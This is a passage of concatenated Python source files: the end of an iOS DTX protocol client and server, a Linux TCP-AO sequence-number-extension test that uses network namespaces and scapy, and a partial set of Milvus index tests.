chunk = client.recv(length - len(buf))
if not chunk:
raise MuxError("socket connection close")
buf.extend(chunk)
log.debug(f'接收 DTX buf: {buf}')
return buf
def send_dtx(self, client, dtx):
buffer = bytes(dtx)
log.debug(f'发送 DTX: {buffer}')
return client.send(buffer)
def recv_dtx(self, client):
"""
:param client:
:param timeout: (s)
:return:
"""
payload = bytearray()
while True:
header_buffer = self.recv(client, dtx_message_header.sizeof())
if not header_buffer:
return None
header = dtx_message_header.parse(header_buffer)
if header.fragment_id == 0:
if header.channel not in self._dtx_manager:
self._dtx_manager[header.channel] = (header_buffer, payload)
if header.fragment_count > 1:
continue
body_buffer = self.recv(client, header.payload_length)
if not body_buffer:
break
self._dtx_manager.get(header.channel)[1].extend(body_buffer)
if header.fragment_id == header.fragment_count - 1:
break
data = self._dtx_manager.get(header.channel)
self._dtx_manager.pop(header.channel)
return DTXMessage.decode(data[0], data[1])
class DTXServer:
def __init__(self, lockdown=None, udid=None):
self.udid = udid
self.lockdown = lockdown
self._cli = None
self._recv_thread = None
self._running = False
self._callbacks = {}
self._undefined_callback = None
self._channel_callbacks = {}
self._channels = {}
self._receiver_exiting = False
self._published_capabilities = None
self._reply_queues = defaultdict(queue.Queue)
self._next_identifier = 1
self._client = DTXClient()
self.done = Event()
self.register()
def register(self):
def _notifyOfPublishedCapabilities(res):
self.done.set()
self._published_capabilities = res.auxiliaries
self.register_selector_callback("_notifyOfPublishedCapabilities:", _notifyOfPublishedCapabilities)
def init(self, _cli=None):
""" 继承类
初始化 servers 服务:
:return: bool 是否成功
"""
self._cli = _cli
self._start()
return self
def _start(self):
"""
启动 servers 服务, 此接口用户无需调用, 用户使用 init 接口
:return: bool 是否成功
"""
if self._running:
return True
self._running = True
self._recv_thread = Thread(target=self._receiver, name="InstrumentServer")
self._recv_thread.start()
while not self.done.wait(5):
logging.debug("[WARN] timeout waiting capabilities")
return False
return True
def stop(self):
"""
停止 servers 服务
:return: 无返回值
"""
self._running = False
if self._recv_thread:
self._recv_thread = None
if self._cli:
self._cli.close()
self._cli = None
def _run_callbacks(self, event_name, data):
"""
Returns:
if called
"""
func = self._callbacks.get(event_name)
if func:
func(data)
return True
def register_selector_callback(self, selector: str, callback: typing.Callable):
"""
:param selector:
:param callback:
"""
self._callbacks[selector] = callback
def register_channel_callback(self, channel: str, callback: typing.Callable):
"""
Return channel messages
:param channel:
:param callback
"""
log.info(f'set {channel} callback ...')
channel_id = self.make_channel(channel)
self._channel_callbacks[channel_id] = callback
def register_undefined_callback(self, callback: typing.Callable):
"""
Returns all undefined messages
:param callback
"""
self._undefined_callback = callback
def make_channel(self, channel: str):
if channel in self._channels:
return self._channels[channel]
channel_id = len(self._channels) + 1
self._call(True, 0, "_requestChannelWithCode:identifier:", channel_id, channel)
self._channels[channel] = channel_id
return channel_id
def call(self, channel: str, selector: str, *auxiliaries):
channel_id = self.make_channel(channel)
ret = self._call(True, channel_id, selector, *auxiliaries)
return ret
def _reply_ack(self, data):
reply = DTXMessage()
reply._channel_code = data.channel_code
reply._identifier = data.identifier
reply._conversation_index = data.conversation_index + 1
reply._flags = 0x3
reply._selector = b'\00' * 16
self._client.send_dtx(self._cli, reply)
def wait_reply(self, message_id: int, timeout=30.0) -> DTXMessage:
ret = self._reply_queues[message_id].get(timeout=timeout)
if ret is None:
raise MuxError("connection closed")
return ret
def _call(self, sync: bool, channel_id: int, selector: str, *auxiliaries):
"""
:param sync: 是否回调
:param channel_id: 通道标识
:param selector: 请求方法名称,method name
:param auxiliaries:
:return:
"""
identifier = self._next_identifier
dtx = DTXMessage()
dtx._identifier = identifier
dtx._channel_code = channel_id
dtx._selector = selector
dtx._expects_reply = sync
aux = MessageAux()
dtx.auxiliaries = aux
self._next_identifier += 1
for arg in auxiliaries:
object_to_aux(arg, aux)
self._client.send_dtx(self._cli, dtx)
if sync:
ret = self.wait_reply(identifier)
return ret
def _receiver(self):
try:
while self._running:
dtx = self._client.recv_dtx(self._cli)
if '_channelCanceled:' in str(dtx.selector):
self._cli.close()
if dtx.conversation_index == 1:
self._reply_queues[dtx.identifier].put(dtx)
elif (2 ** 32 - dtx.channel_code) in self._channel_callbacks:
self._channel_callbacks[(2 ** 32 - dtx.channel_code)](dtx)
else:
selector = dtx.selector
if isinstance(selector, str) and selector in self._callbacks:
self._callbacks[selector](dtx)
elif self._undefined_callback:
self._undefined_callback(dtx)
if dtx.expects_reply:
self._reply_ack(dtx)
except MuxError as E:
log.warn(E)
except Exception as E:
log.exception(E)
finally:
self._run_callbacks(DTXEnum.FINISHED, None)
self.stop()
|
test_sne.py
|
# SPDX-License-Identifier: GPL-2.0
"""Validate SNE implementation for TCP-AO"""
import logging
import socket
import subprocess
from contextlib import ExitStack
from ipaddress import ip_address
from threading import Thread
import pytest
import waiting
from scapy.layers.inet import TCP
from scapy.packet import Packet, Raw
from .exthread import ExThread
from .linux_tcp_authopt import (
TCP_AUTHOPT_ALG,
set_tcp_authopt_key_kwargs,
tcp_authopt_key,
)
from .linux_tcp_repair import get_tcp_repair_recv_send_queue_seq, tcp_repair_toggle
from .linux_tcp_repair_authopt import (
get_tcp_repair_authopt,
has_tcp_repair_authopt_on_sock,
)
from .netns_fixture import NamespaceFixture
from .scapy_conntrack import TCPConnectionKey, TCPConnectionTracker
from .scapy_tcp_authopt import (
TcpAuthOptAlg_HMAC_SHA1,
add_tcp_authopt_signature,
check_tcp_authopt_signature,
)
from .scapy_utils import AsyncSnifferContext, create_capture_socket, tcp_seq_wrap
from .server import SimpleServerThread
from .tcp_connection_fixture import TCPConnectionFixture
from .utils import (
DEFAULT_TCP_SERVER_PORT,
check_socket_echo,
create_client_socket,
create_listen_socket,
netns_context,
randbytes,
socket_set_linger,
)
from .validator import TcpAuthValidator, TcpAuthValidatorKey
logger = logging.getLogger(__name__)
def add_connection_info(
tracker: TCPConnectionTracker,
saddr,
daddr,
sport,
dport,
sisn,
disn,
):
client2server_key = TCPConnectionKey(
saddr=saddr,
daddr=daddr,
sport=sport,
dport=dport,
)
client2server_conn = tracker.get_or_create(client2server_key)
client2server_conn.sisn = sisn
client2server_conn.disn = disn
client2server_conn.snd_sne.reset(sisn)
client2server_conn.rcv_sne.reset(disn)
client2server_conn.found_syn = True
client2server_conn.found_synack = True
server2client_conn = tracker.get_or_create(client2server_key.rev())
server2client_conn.sisn = disn
server2client_conn.disn = sisn
server2client_conn.snd_sne.reset(disn)
server2client_conn.rcv_sne.reset(sisn)
server2client_conn.found_syn = True
server2client_conn.found_synack = True
@pytest.mark.parametrize("signed", [False, True])
def test_high_seq_rollover(exit_stack: ExitStack, signed: bool):
"""Test SNE by rolling over from a high seq/ack value
Create many connections until a very high seq/ack is found and then transfer
enough for those values to roll over.
A side effect of this approach is that this stresses connection
establishment.
"""
address_family = socket.AF_INET
overflow = 0x200000
bufsize = 0x10000
secret_key = b"12345"
mode = "echo"
validator_enabled = True
fail = False
nsfixture = exit_stack.enter_context(NamespaceFixture())
server_addr = nsfixture.get_addr(address_family, 1)
client_addr = nsfixture.get_addr(address_family, 2)
server_addr_port = (str(server_addr), DEFAULT_TCP_SERVER_PORT)
listen_socket = create_listen_socket(
ns=nsfixture.server_netns_name,
family=address_family,
bind_addr=server_addr,
listen_depth=1024,
)
exit_stack.enter_context(listen_socket)
tcp_repair_authopt_enabled = has_tcp_repair_authopt_on_sock(listen_socket)
if signed:
set_tcp_authopt_key_kwargs(listen_socket, key=secret_key)
server_thread = SimpleServerThread(listen_socket, mode=mode, bufsize=bufsize)
exit_stack.enter_context(server_thread)
found = False
client_socket = None
for iternum in range(50000):
try:
# Manually assign increasing client ports
#
# Sometimes linux kills timewait sockets (TCPTimeWaitOverflow) and
# then attempts to reuse the port. The stricter validation
# requirements of TCP-AO mean the other side of the socket survives
# and rejects packets coming from the reused port.
#
# This issue is not related to SNE so a workaround is acceptable.
client_socket = create_client_socket(
ns=nsfixture.client_netns_name,
family=address_family,
bind_addr=client_addr,
bind_port=10000 + iternum,
)
if signed:
set_tcp_authopt_key_kwargs(client_socket, key=secret_key)
try:
client_socket.connect(server_addr_port)
except:
logger.error("failed connect on iteration %d", iternum, exc_info=True)
raise
recv_seq, send_seq = get_tcp_repair_recv_send_queue_seq(client_socket)
if (recv_seq + overflow > 0x100000000 and mode == "echo") or (
send_seq + overflow > 0x100000000
):
found = True
break
# Wait for graceful close to avoid swamping server listen queue.
# This makes the test work even with a server listen_depth=1 but set
# a very high value anyway.
socket_set_linger(client_socket, 1, 1)
client_socket.close()
client_socket = None
finally:
if not found and client_socket:
client_socket.close()
assert found
assert client_socket is not None
logger.debug("setup recv_seq %08x send_seq %08x", recv_seq, send_seq)
# Init tcp_repair_authopt
if signed and tcp_repair_authopt_enabled:
with tcp_repair_toggle(client_socket):
init_tcp_repair_authopt = get_tcp_repair_authopt(client_socket)
assert init_tcp_repair_authopt.src_isn + 1 == send_seq
assert init_tcp_repair_authopt.dst_isn + 1 == recv_seq
assert init_tcp_repair_authopt.snd_sne == 0
assert init_tcp_repair_authopt.rcv_sne == 0
logger.debug("tcp repair authopt: %r", init_tcp_repair_authopt)
# Init validator
if signed and validator_enabled:
capture_filter = f"tcp port {DEFAULT_TCP_SERVER_PORT}"
capture_socket = create_capture_socket(
ns=nsfixture.client_netns_name,
iface="veth0",
filter=capture_filter,
)
sniffer = exit_stack.enter_context(
AsyncSnifferContext(opened_socket=capture_socket)
)
validator = TcpAuthValidator()
validator.keys.append(
TcpAuthValidatorKey(key=secret_key, alg_name="HMAC-SHA-1-96")
)
# validator.debug_sne = True
# validator.log_traffic_key = True
# validator.log_mac = True
# SYN+SYNACK is not captured so initialize connection info manually
add_connection_info(
validator.tracker,
saddr=ip_address(client_addr),
daddr=ip_address(server_addr),
dport=client_socket.getpeername()[1],
sport=client_socket.getsockname()[1],
sisn=tcp_seq_wrap(send_seq - 1),
disn=tcp_seq_wrap(recv_seq - 1),
)
transfer_iter_count = 2 * overflow // bufsize
logger.info(
"transfer %d bytes in %d iterations",
2 * overflow,
transfer_iter_count,
)
for iternum in range(transfer_iter_count):
try:
if mode == "recv":
from .utils import randbytes
send_buf = randbytes(bufsize)
client_socket.sendall(send_buf)
else:
check_socket_echo(client_socket, bufsize)
except:
logger.error("failed traffic on iteration %d", iternum, exc_info=True)
fail = True
break
new_recv_seq, new_send_seq = get_tcp_repair_recv_send_queue_seq(client_socket)
logger.debug("final recv_seq %08x send_seq %08x", new_recv_seq, new_send_seq)
if not (new_recv_seq < recv_seq or new_send_seq < send_seq):
fail = True
# Validate capture
if signed and validator_enabled:
import time
time.sleep(1)
sniffer.stop()
for p in sniffer.results:
validator.handle_packet(p)
# Allow incomplete connections from FIN/ACK of connections dropped
# because of low seq/ack
# validator.raise_errors(allow_incomplete=True)
if validator.any_fail or validator.any_unsigned:
fail = True
client_scappy_key = TCPConnectionKey(
saddr=ip_address(client_addr),
daddr=ip_address(server_addr),
dport=client_socket.getpeername()[1],
sport=client_socket.getsockname()[1],
)
client_scappy_conn = validator.tracker.get(client_scappy_key)
assert client_scappy_conn
snd_sne_rollover = client_scappy_conn.snd_sne.sne != 0
rcv_sne_rollover = client_scappy_conn.rcv_sne.sne != 0
if not (snd_sne_rollover or rcv_sne_rollover):
logger.error("expected either snd_snd or rcv_sne to rollover")
fail = True
# Validate SNE as read via TCP_REPAIR_AUTHOPT
if signed and tcp_repair_authopt_enabled:
with tcp_repair_toggle(client_socket):
exit_tcp_repair_authopt = get_tcp_repair_authopt(client_socket)
logger.debug("exit tcp repair authopt: %r", exit_tcp_repair_authopt)
assert exit_tcp_repair_authopt.src_isn == init_tcp_repair_authopt.src_isn
assert exit_tcp_repair_authopt.dst_isn == init_tcp_repair_authopt.dst_isn
if not (exit_tcp_repair_authopt.snd_sne or exit_tcp_repair_authopt.rcv_sne):
logger.error("expected either snd_snd or rcv_sne to rollover")
fail = True
assert not fail
def _block_client_tcp(nsfixture: NamespaceFixture, address_family=socket.AF_INET):
"""Prevent TCP in client namespace from sending RST
Do this by removing the client address and inserting a static ARP on server side.
"""
client_prefix_length = nsfixture.get_prefix_length(address_family)
client_addr = nsfixture.get_ipv4_addr(2, 1)
script = (
f"""
set -e
ip netns exec {nsfixture.client_netns_name} ip addr del {client_addr}/{client_prefix_length} dev veth0
ip netns exec {nsfixture.server_netns_name} ip neigh add {client_addr} lladdr {nsfixture.client_mac_addr} dev veth0
""",
)
subprocess.run(script, shell=True, check=True)
@pytest.mark.parametrize("client_isn", [0xFFFF0000, 0xFFFFFFFF], ids=hex)
def test_syn_seq_ffffffff(exit_stack: ExitStack, client_isn):
"""Test SYN with seq=0xffffffff
Client is pytest, server is linux.
"""
con = TCPConnectionFixture()
secret_key = b"hello"
con.tcp_authopt_key = tcp_authopt_key(
alg=TCP_AUTHOPT_ALG.HMAC_SHA_1_96,
key=secret_key,
)
exit_stack.enter_context(con)
client_l2socket = con.client_l2socket
server_isn = 0
DEFAULT_BUFSIZE = 1000
def sign(packet, sne=0):
add_tcp_authopt_signature(
packet,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
client_isn,
server_isn,
sne=sne,
)
_block_client_tcp(con.nsfixture)
# send SYN
p = con.create_client2server_packet()
p[TCP].flags = "S"
p[TCP].seq = client_isn
p[TCP].ack = 0
sign(p)
client_l2socket.send(p)
# wait SYN/ACK
def has_synack():
return (
con.sniffer_session.client_info is not None
and con.sniffer_session.client_info.disn is not None
)
waiting.wait(has_synack, timeout_seconds=5, sleep_seconds=0.1)
assert con.sniffer_session.client_info.disn
server_isn = con.sniffer_session.client_info.disn
# send ACK to SYN/ACK
p = con.create_client2server_packet()
p[TCP].flags = "A"
p[TCP].seq = tcp_seq_wrap(client_isn + 1)
p[TCP].ack = tcp_seq_wrap(server_isn + 1)
sign(p, sne=(client_isn + 1) >> 32)
client_l2socket.send(p)
# send data
p = con.create_client2server_packet()
p[TCP].flags = "PA"
p[TCP].seq = tcp_seq_wrap(client_isn + 1)
p[TCP].ack = tcp_seq_wrap(server_isn + 1)
p /= Raw(randbytes(DEFAULT_BUFSIZE))
sign(p, sne=(client_isn + 1) >> 32)
client_l2socket.send(p)
def has_response():
con.assert_no_snmp_output_failures()
plist = con.sniffer_session.toPacketList()
logger.info("sniffer list:\n%s", plist)
for p in plist:
logger.info("p %s len %d", p.summary(), len(p))
th = p.getlayer(TCP)
if not th:
continue
logger.info("th %s len %d", p.summary(), len(th.payload))
if th.sport != DEFAULT_TCP_SERVER_PORT:
continue
th_end_seq = th.seq + len(th.payload)
logger.info(
"th_end_seq %08x versus server_isn %08x", th_end_seq, server_isn
)
if th_end_seq - server_isn >= DEFAULT_BUFSIZE:
logger.info("packet %s looks like a server response", th.summary())
return True
return False
waiting.wait(has_response, timeout_seconds=5, sleep_seconds=1)
def _block_server_tcp(nsfixture: NamespaceFixture, address_family=socket.AF_INET):
splen = nsfixture.get_prefix_length(address_family)
saddr = nsfixture.get_ipv4_addr(1, 1)
script = (
f"""
set -e
ip netns exec {nsfixture.server_netns_name} ip addr del {saddr}/{splen} dev veth0
ip netns exec {nsfixture.client_netns_name} ip neigh add {saddr} lladdr {nsfixture.server_mac_addr} dev veth0
""",
)
subprocess.run(script, shell=True, check=True)
@pytest.mark.parametrize("server_isn", [0xFFFF0000, 0xFFFFFFFF], ids=hex)
def test_synack_seq_ffffffff(exit_stack: ExitStack, server_isn: int):
"""Test SYNACK with seq=0xffffffff
Verifies linux client behavior against a server that sends SYNACK with seq=0xffffffff
"""
secret_key = b"hello"
con = TCPConnectionFixture(capture_on_client=True)
con.tcp_authopt_key = tcp_authopt_key(
alg=TCP_AUTHOPT_ALG.HMAC_SHA_1_96,
key=secret_key,
)
exit_stack.enter_context(con)
sniffer_session = con.sniffer_session
server_l2socket = con.server_l2socket
client_isn = 0
def sign(packet, sne=0):
add_tcp_authopt_signature(
packet,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
server_isn,
client_isn,
sne=sne,
)
_block_server_tcp(con.nsfixture)
def run_client_thread():
# If this fails it will likely be with a timeout
logger.info("client connect call")
con.client_socket.connect(con.server_addr_port)
logger.info("client connect done")
client_thread = ExThread(target=run_client_thread)
client_thread.start()
# wait SYN
def has_recv_syn():
return (
con.sniffer_session.server_info is not None
and con.sniffer_session.server_info.disn is not None
)
waiting.wait(has_recv_syn, timeout_seconds=5, sleep_seconds=0.1)
assert sniffer_session.server_info.disn is not None
client_isn = sniffer_session.server_info.disn
logger.info("Received SYN with SEQ=%d", client_isn)
# craft SYN/ACK
p = con.create_server2client_packet()
p[TCP].flags = "SA"
p[TCP].seq = server_isn
p[TCP].ack = tcp_seq_wrap(client_isn + 1)
sign(p)
server_l2socket.send(p)
def is_client_ack(p: Packet):
th = p.getlayer(TCP)
if not th:
return False
if not sniffer_session.server_info.is_recv_match(p):
return False
if th.flags.A and th.ack == tcp_seq_wrap(server_isn + 1):
check_tcp_authopt_signature(
p,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
client_isn,
server_isn,
sne=(server_isn + 1) >> 32,
)
return True
return False
def sniffer_has_packet(pred):
for p in sniffer_session.lst:
if pred(p):
return True
return False
def has_client_ack():
return sniffer_has_packet(is_client_ack)
waiting.wait(has_client_ack, timeout_seconds=5, sleep_seconds=0.1)
# No attempt is made to transfer data
# Will raise any errors from client_thread_run
client_thread.join()
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field, with the different names, num of the names equal to the maximum num supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field, with the different names, num of the names more than the maximum num supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
